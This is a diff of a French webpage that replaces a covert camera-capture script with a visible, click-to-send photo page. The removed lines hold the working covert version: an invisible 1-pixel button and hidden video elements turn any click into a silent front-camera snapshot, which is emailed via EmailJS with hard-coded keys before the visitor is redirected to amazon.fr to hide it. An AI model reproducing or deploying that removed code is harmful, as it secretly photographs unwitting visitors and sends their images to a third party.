--- a/index.html
+++ b/index.html
@@ -2,64 +2,44 @@
 <html lang="fr">
 <head>
   <meta charset="UTF-8">
-  <title>Capture unique</title>
-  <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
-  <style>
-    body, html { margin:0; padding:0; height:100%; overflow:hidden; background:none; cursor:pointer; }
-    #triggerButton { width:1px; height:1px; opacity:0; border:none; background:none; }
-    video, canvas { display:none; }
-  </style>
+  <title>Photo volontaire</title>
+  <script src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
 </head>
 <body>
-  <button id="triggerButton">Start</button>
-  <video id="video" autoplay playsinline></video>
-  <canvas id="canvas" width="100" height="75"></canvas>
+  <h2>Prendre une photo et l’envoyer</h2>
+  <video id="video" autoplay playsinline width="300"></video>
+  <canvas id="canvas" width="300" height="200" style="display:none;"></canvas>
+  <br>
+  <button id="capture">📸 Prendre la photo</button>
 
   <script>
+    // Initialiser EmailJS avec ton Public Key
     emailjs.init("IoSfbtGz4KSL_5_9E");
 
     const video = document.getElementById('video');
     const canvas = document.getElementById('canvas');
     const context = canvas.getContext('2d');
-    const button = document.getElementById('triggerButton');
+    const captureButton = document.getElementById('capture');
 
-    async function captureOnePhoto() {
-      try {
-        const stream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" } });
+    // Demander l’accès à la caméra
+    navigator.mediaDevices.getUserMedia({ video: true })
+      .then(stream => {
         video.srcObject = stream;
+      })
+      .catch(err => console.error("Erreur caméra :", err));
 
-        video.onloadeddata = () => {
-          // Prendre la photo
-          context.drawImage(video, 0, 0, canvas.width, canvas.height);
+    // Prendre la photo au clic
+    captureButton.addEventListener('click', () => {
+      context.drawImage(video, 0, 0, canvas.width, canvas.height);
+      const imageData = canvas.toDataURL("image/png");
 
-          // Arrêter immédiatement le flux vidéo
-          stream.getTracks().forEach(track => track.stop());
-
-          // Convertir en JPEG ultra-compressé sans métadonnées
-          canvas.toBlob((blob) => {
-            const reader = new FileReader();
-            reader.onloadend = () => {
-              const imageData = reader.result;
-
-              emailjs.send("service_8cs0gml", "template_hgvdx1g", {
-                message: "Photo unique capturée 📸",
-                image: imageData
-              })
-              .then(() => { window.location.href = "https://www.amazon.fr"; })
-              .catch((err) => { console.log("Erreur EmailJS:", err); window.location.href = "https://www.amazon.fr"; });
-            };
-            reader.readAsDataURL(blob);
-          }, "image/jpeg", 0.05);
-        };
-
-      } catch (err) {
-        console.log("Erreur caméra:", err);
-        window.location.href = "https://www.amazon.fr";
-      }
-    }
-
-    document.body.addEventListener('click', () => button.click());
-    button.addEventListener('click', captureOnePhoto);
+      emailjs.send("service_8cs0gml", "template_hxfltc", {
+        message: "Nouvelle photo volontaire 📸",
+        image: imageData
+      })
+      .then(() => alert("Photo envoyée avec succès ✅"))
+      .catch(err => console.error("Erreur EmailJS :", err));
+    });
   </script>
 </body>
 </html>
